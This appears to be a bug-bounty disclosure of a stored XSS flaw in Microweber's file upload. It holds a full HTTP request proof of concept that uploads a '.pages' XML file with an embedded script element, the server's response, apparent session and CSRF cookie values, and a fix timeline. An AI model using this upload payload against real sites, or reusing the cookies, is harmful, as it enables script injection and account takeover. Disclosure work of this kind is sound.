Cross-site scripting - Stored via upload ".pages" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022


Description

In file upload function, the server allow upload .pages file with contain some javascript code lead to XSS.

Proof of Concept

REQUEST:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 961
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.pages
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE:

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:10:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:10:19 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 133

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.pages","name":"xss-poc.pages","bytes_uploaded":"961"}

Poc Image

image

Impact

This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 70b46e a month ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
to join this conversation